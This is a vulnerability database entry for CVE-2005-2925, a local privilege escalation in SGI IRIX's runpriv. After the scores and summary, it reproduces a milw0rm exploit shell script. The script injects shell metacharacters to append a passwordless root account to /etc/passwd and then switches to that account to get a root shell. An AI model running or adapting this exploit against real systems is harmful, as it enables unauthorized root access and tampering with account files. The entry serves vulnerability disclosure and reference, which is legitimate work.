CVE-2005-2925

Published: 12/10/2005 Updated: 19/10/2018
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 725
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

runpriv in SGI IRIX allows local users to bypass intended restrictions and execute arbitrary commands via shell metacharacters in a command line for a privileged binary in /usr/sysadm/privbin.

Vulnerable Product

sgi irix 6.5.22

Exploits

#!/bin/sh
# Advisory: www.idefense.com/intelligence/vulnerabilities/display.php?id=312
/usr/sysadm/bin/runpriv mountfs -s test -d / -o | "ksh -c 'echo r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd'"
su r00t -c "chown root:sys /tmp/passwd123 ; mv /tmp/passwd123 /etc/passwd ; chmod 644 /etc/passwd ; su"
# milw0rm.com [2005-10-10]
...